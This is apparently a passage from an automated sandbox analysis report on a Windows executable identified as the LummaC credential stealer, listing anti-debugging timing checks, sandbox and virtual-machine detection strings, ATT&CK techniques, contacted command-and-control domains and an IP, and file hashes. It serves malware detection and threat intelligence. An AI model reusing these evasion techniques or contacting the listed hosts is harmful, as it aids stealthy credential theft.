      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49E0331 second address: 49E034F instructions: 0x00000000 rdtsc 0x00000002 mov eax, 46101DEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F998484EB11h 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49E034F second address: 49E0375 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 mov ch, bh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9984B08D17h 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49E0375 second address: 49E0379 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49E0379 second address: 49E037F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49E037F second address: 49E03BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F998484EB12h 0x00000009 adc cx, E8D8h 0x0000000e jmp 00007F998484EB0Bh 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 nop 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F998484EB0Eh 0x00000023 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49E03BE second address: 49E03CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9984B08D0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49E040A second address: 49E04F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F998484EB12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F998484EB0Eh 0x00000012 or cx, 3258h 0x00000017 jmp 00007F998484EB0Bh 0x0000001c popfd 0x0000001d mov bx, cx 0x00000020 popad 0x00000021 jg 00007F99F5A8CB4Bh 0x00000027 jmp 00007F998484EB12h 0x0000002c js 00007F998484EB7Bh 0x00000032 jmp 00007F998484EB10h 0x00000037 cmp dword ptr [ebp-14h], edi 0x0000003a jmp 00007F998484EB10h 0x0000003f jne 00007F99F5A8CB19h 0x00000045 pushad 0x00000046 pushfd 0x00000047 jmp 00007F998484EB0Eh 0x0000004c sbb si, 5648h 0x00000051 jmp 00007F998484EB0Bh 0x00000056 popfd 0x00000057 pushfd 0x00000058 jmp 00007F998484EB18h 0x0000005d adc ax, 98A8h 0x00000062 jmp 00007F998484EB0Bh 0x00000067 popfd 0x00000068 popad 0x00000069 mov ebx, dword ptr [ebp+08h] 0x0000006c push eax 0x0000006d push edx 0x0000006e jmp 00007F998484EB15h 0x00000073 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49E04F4 second address: 49E0504 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9984B08D0Ch 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49E0504 second address: 49E0560 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-2Ch] 0x0000000b jmp 00007F998484EB17h 0x00000010 xchg eax, esi 0x00000011 pushad 0x00000012 jmp 00007F998484EB14h 0x00000017 jmp 00007F998484EB12h 0x0000001c popad 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F998484EB0Eh 0x00000025 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49E0560 second address: 49E0572 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9984B08D0Eh 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49E0572 second address: 49E058A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F998484EB0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49E058A second address: 49E05A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9984B08D17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49E05A5 second address: 49E0635 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F998484EB19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov ax, DD73h 0x0000000f jmp 00007F998484EB18h 0x00000014 popad 0x00000015 push eax 0x00000016 pushad 0x00000017 mov bh, E0h 0x00000019 mov dl, cl 0x0000001b popad 0x0000001c nop 0x0000001d jmp 00007F998484EB15h 0x00000022 xchg eax, ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov eax, edx 0x00000028 pushfd 0x00000029 jmp 00007F998484EB0Fh 0x0000002e xor esi, 119C399Eh 0x00000034 jmp 00007F998484EB19h 0x00000039 popfd 0x0000003a popad 0x0000003b rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49E0635 second address: 49E0645 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9984B08D0Ch 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49E0645 second address: 49E0649 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49E0689 second address: 49E068F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49E068F second address: 49E0693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49E0693 second address: 49E0697 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49E0697 second address: 49E06D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, eax 0x0000000a jmp 00007F998484EB17h 0x0000000f test esi, esi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 call 00007F998484EB12h 0x00000019 pop ecx 0x0000001a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49E06D0 second address: 49D0E0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9984B08D0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F9984B08D18h 0x0000000f or esi, 3E81FC48h 0x00000015 jmp 00007F9984B08D0Bh 0x0000001a popfd 0x0000001b popad 0x0000001c je 00007F99F5D46C50h 0x00000022 xor eax, eax 0x00000024 jmp 00007F9984AE243Ah 0x00000029 pop esi 0x0000002a pop edi 0x0000002b pop ebx 0x0000002c leave 0x0000002d retn 0004h 0x00000030 nop 0x00000031 cmp eax, 00000000h 0x00000034 setne cl 0x00000037 xor ebx, ebx 0x00000039 test cl, 00000001h 0x0000003c jne 00007F9984B08D07h 0x0000003e jmp 00007F9984B08E43h 0x00000043 call 00007F9988CA8E22h 0x00000048 mov edi, edi 0x0000004a jmp 00007F9984B08D14h 0x0000004f xchg eax, ebp 0x00000050 pushad 0x00000051 mov ax, ABCDh 0x00000055 movzx esi, dx 0x00000058 popad 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d pushfd 0x0000005e jmp 00007F9984B08D11h 0x00000063 sub cx, 6856h 0x00000068 jmp 00007F9984B08D11h 0x0000006d popfd 0x0000006e jmp 00007F9984B08D10h 0x00000073 popad 0x00000074 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49D0E0F second address: 49D0E76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F998484EB11h 0x00000009 xor ch, 00000066h 0x0000000c jmp 00007F998484EB11h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F998484EB10h 0x00000018 sub ax, EC08h 0x0000001d jmp 00007F998484EB0Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 xchg eax, ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F998484EB15h 0x0000002e rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49D0E76 second address: 49D0E88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 push edi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49D0E88 second address: 49D0E8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 49D0E8E second address: 49D0ED8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9984B08D19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b pushad 0x0000000c mov edx, 52728F3Ch 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007F9984B08D0Bh 0x00000018 mov bh, ch 0x0000001a popad 0x0000001b popad 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F9984B08D11h 0x00000024 rdtsc
      Tries to evade debugger and weak emulator (self modifying code)
      Source: C:\Users\user\Desktop\random(3).exeSpecial instruction interceptor: First address: 856AAF instructions caused by: Self-modifying code
      Source: C:\Users\user\Desktop\random(3).exeSpecial instruction interceptor: First address: 856B73 instructions caused by: Self-modifying code
      Source: C:\Users\user\Desktop\random(3).exeSpecial instruction interceptor: First address: 9FD772 instructions caused by: Self-modifying code
      Source: C:\Users\user\Desktop\random(3).exeSpecial instruction interceptor: First address: A087A9 instructions caused by: Self-modifying code
      Source: C:\Users\user\Desktop\random(3).exeSpecial instruction interceptor: First address: A91B6F instructions caused by: Self-modifying code
      Source: C:\Users\user\Desktop\random(3).exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_008572A3 rdtsc 0_2_008572A3
      Source: C:\Users\user\Desktop\random(3).exe TID: 7628Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
      Source: random(3).exe, 00000000.00000002.1882114871.00000000009E0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
      Source: random(3).exe, 00000000.00000003.1793215658.0000000000CE9000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000000.00000002.1882716747.0000000000CE9000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000000.00000002.1882716747.0000000000C98000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000000.00000003.1800616960.0000000000CE9000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000000.00000003.1799909045.0000000000CE9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: random(3).exe, 00000000.00000002.1882114871.00000000009E0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
      Source: C:\Users\user\Desktop\random(3).exeSystem information queried: ModuleInformationJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging

      barindex
      Hides threads from debuggers
      Source: C:\Users\user\Desktop\random(3).exeThread information set: HideFromDebuggerJump to behavior
      Tries to detect sandboxes and other dynamic analysis tools (window names)
      Source: C:\Users\user\Desktop\random(3).exeOpen window title or class name: regmonclass
      Source: C:\Users\user\Desktop\random(3).exeOpen window title or class name: gbdyllo
      Source: C:\Users\user\Desktop\random(3).exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
      Source: C:\Users\user\Desktop\random(3).exeOpen window title or class name: procmon_window_class
      Source: C:\Users\user\Desktop\random(3).exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
      Source: C:\Users\user\Desktop\random(3).exeOpen window title or class name: ollydbg
      Source: C:\Users\user\Desktop\random(3).exeOpen window title or class name: filemonclass
      Source: C:\Users\user\Desktop\random(3).exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
      Source: C:\Users\user\Desktop\random(3).exeFile opened: NTICE
      Source: C:\Users\user\Desktop\random(3).exeFile opened: SICE
      Source: C:\Users\user\Desktop\random(3).exeFile opened: SIWVID
      Source: C:\Users\user\Desktop\random(3).exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_008572A3 rdtsc 0_2_008572A3
      Source: C:\Users\user\Desktop\random(3).exeCode function: 0_2_0083BCE0 LdrInitializeThunk,0_2_0083BCE0
      Source: random(3).exe, 00000000.00000002.1882281117.0000000000A27000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: #6Program Manager
      Source: C:\Users\user\Desktop\random(3).exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Users\user\Desktop\random(3).exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

      Stealing of Sensitive Information

      barindex
      Yara detected LummaC Stealer
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

      Remote Access Functionality

      barindex
      Yara detected LummaC Stealer
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
      Windows Management Instrumentation      		1
      DLL Side-Loading      		1
      Process Injection      		44
      Virtualization/Sandbox Evasion      		OS Credential Dumping851
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts2
      Command and Scripting Interpreter      		Boot or Logon Initialization Scripts1
      DLL Side-Loading      		1
      Process Injection      		LSASS Memory44
      Virtualization/Sandbox Evasion      		Remote Desktop ProtocolData from Removable Media2
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      Deobfuscate/Decode Files or Information      		Security Account Manager2
      Process Discovery      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
      Obfuscated Files or Information      		NTDS223
      System Information Discovery      		Distributed Component Object ModelInput Capture114
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
      Software Packing      		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      random(3).exe53%ReversingLabsWin32.Trojan.Generic
      random(3).exe58%VirustotalBrowse
      random(3).exe100%AviraTR/Crypt.TPM.Gen

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      No Antivirus matches

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      explorebieology.run
      		104.21.31.208
      		truefalse
        		high
        gadgethgfub.icu
        		unknown
        		unknowntrue
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://www.cloudflare.com/learning/access-management/phishing-attack/random(3).exe, 00000000.00000003.1793215658.0000000000CE9000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000000.00000003.1792632697.0000000000D29000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000000.00000003.1799758900.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000000.00000003.1800616960.0000000000CE9000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000000.00000003.1799909045.0000000000CE9000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            https://www.cloudflare.com/5xx-error-landingrandom(3).exe, 00000000.00000003.1793215658.0000000000CE9000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000000.00000003.1792632697.0000000000D29000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000000.00000003.1799909045.0000000000CAC000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000000.00000003.1799758900.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000000.00000003.1800616960.0000000000CE9000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000000.00000003.1792783064.0000000000CAC000.00000004.00000020.00020000.00000000.sdmp, random(3).exe, 00000000.00000003.1799909045.0000000000CE9000.00000004.00000020.00020000.00000000.sdmpfalse
              		high

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              104.21.31.208
              		explorebieology.runUnited States
              		13335CLOUDFLARENETUSfalse

              General Information

              Joe Sandbox version:42.0.0 Malachite
              Analysis ID:1629896
              Start date and time:2025-03-05 09:15:45 +01:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 3m 25s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:2
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:random(3).exe
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@1/0@2/1
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:Failed
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Stop behavior analysis, all processes terminated

              Warnings

              • Exclude process from analysis (whitelisted): SIHClient.exe
              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              03:16:47API Interceptor5x Sleep call for process: random(3).exe modified

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              104.21.31.208JqGBbm7.exeGet hashmaliciousLummaC StealerBrowse
                xIwQcY1fc4.exeGet hashmaliciousAmadey, GCleaner, LummaC Stealer, PureLog StealerBrowse
                  S6uUdOHRxv.exeGet hashmaliciousLummaC StealerBrowse
                    R3tmayKLpF.exeGet hashmaliciousLummaC StealerBrowse
                      https://masdom.comGet hashmaliciousUnknownBrowse

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        explorebieology.runJqGBbm7.exeGet hashmaliciousLummaC StealerBrowse
                        • 104.21.31.208
                        GMOgZgNpNu.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                        • 172.67.179.246
                        xIwQcY1fc4.exeGet hashmaliciousAmadey, GCleaner, LummaC Stealer, PureLog StealerBrowse
                        • 104.21.31.208
                        S6uUdOHRxv.exeGet hashmaliciousLummaC StealerBrowse
                        • 104.21.31.208
                        R3tmayKLpF.exeGet hashmaliciousLummaC StealerBrowse
                        • 104.21.31.208

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        CLOUDFLARENETUSJqGBbm7.exeGet hashmaliciousLummaC StealerBrowse
                        • 104.21.31.208
                        MCxU5Fj.exeGet hashmaliciousLummaC Stealer, PureLog StealerBrowse
                        • 188.114.97.3
                        https://variotok.comGet hashmaliciousHTMLPhisherBrowse
                        • 104.18.95.41
                        virut' in file 'Setup.exe', during attempted open by 'explorer.exe'Get hashmaliciousUnknownBrowse
                        • 104.18.26.149
                        GMOgZgNpNu.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                        • 172.67.179.246
                        xIwQcY1fc4.exeGet hashmaliciousAmadey, GCleaner, LummaC Stealer, PureLog StealerBrowse
                        • 104.21.31.208
                        Payment copy-8899.exeGet hashmaliciousFormBookBrowse
                        • 172.67.148.163
                        https://040030025.blob.core.windows.net/factura/index.htmlGet hashmaliciousPhisherBrowse
                        • 1.1.1.1
                        MARCH SHIPMENT PLAN DOCS.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • 104.21.32.1
                        DHL AWB Receipt_pdf.bat.exeGet hashmaliciousFormBookBrowse
                        • 104.21.96.1

                        JA3 Fingerprints

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        a0e9f5d64349fb13191bc781f81f42e1JqGBbm7.exeGet hashmaliciousLummaC StealerBrowse
                        • 104.21.31.208
                        MCxU5Fj.exeGet hashmaliciousLummaC Stealer, PureLog StealerBrowse
                        • 104.21.31.208
                        GMOgZgNpNu.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                        • 104.21.31.208
                        xIwQcY1fc4.exeGet hashmaliciousAmadey, GCleaner, LummaC Stealer, PureLog StealerBrowse
                        • 104.21.31.208
                        transferencia HSBC.xla.xlsxGet hashmaliciousUnknownBrowse
                        • 104.21.31.208
                        Order Confirmation.xlsGet hashmaliciousUnknownBrowse
                        • 104.21.31.208
                        transferencia HSBC.xla.xlsxGet hashmaliciousUnknownBrowse
                        • 104.21.31.208
                        d5Wai5fIAK.exeGet hashmaliciousAmadey, GCleaner, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                        • 104.21.31.208
                        VER_3316ARUGVHQMejzy7451UUFA.vbsGet hashmaliciousUnknownBrowse
                        • 104.21.31.208
                        S6uUdOHRxv.exeGet hashmaliciousLummaC StealerBrowse
                        • 104.21.31.208

                        Dropped Files

                        No context

                        Created / dropped Files

                        No created / dropped files found

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):6.600939632856598
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:random(3).exe
                        File size:3'042'304 bytes
                        MD5:8d0cbd77e8d4828aa0df4bb88339f6ac
                        SHA1:bf2ba197991b59779d1215188ff56deb9b151751
                        SHA256:665aee3342bfb1b567acb0d3a130b55bd9dac6ffa01e669f410c3d6c47440b38
                        SHA512:d2c440eea1c30e06bdd8f624407733aeacec0bc53ba5690ab14d565f66e017ae84f6857984db787ad1c744b6e3798742209f6357729819fea3ef8472964bee4f
                        SSDEEP:49152:9igo3N6nPH/J+kDSm8NCpG1nZO/eqEBPvtW5f/1L2:9sN6nPH/J+kf8NC4nM/YPvtWpR2
                        TLSH:D7E53A92750A72CFD44F16B4857FCD8698BD8AB9472049D3AC2CF0BA6D63CC351B6C68
                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g..............................1...........@...........................1......./...@.................................W ..k..

                        File Icon

                        Icon Hash:90cececece8e8eb0

                        Static PE Info

                        General

                        Entrypoint:0x719000
                        Entrypoint Section:.taggant
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                        Time Stamp:0x67C0C953 [Thu Feb 27 20:21:39 2025 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:6
                        OS Version Minor:0
                        File Version Major:6
                        File Version Minor:0
                        Subsystem Version Major:6
                        Subsystem Version Minor:0
                        Import Hash:2eabe9054cad5152567f0699947a2c5b

                        Entrypoint Preview

                        Instruction
                        jmp 00007F998560B9DAh
                        cmovp ebp, dword ptr [esi]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add cl, ch
                        add byte ptr [eax], ah
                        add byte ptr [eax], al
                        add byte ptr [edx], al
                        or al, byte ptr [eax]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], dh
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add bh, bh

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x620570x6b.idata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x610000x1ac.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x621f80x8.idata
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
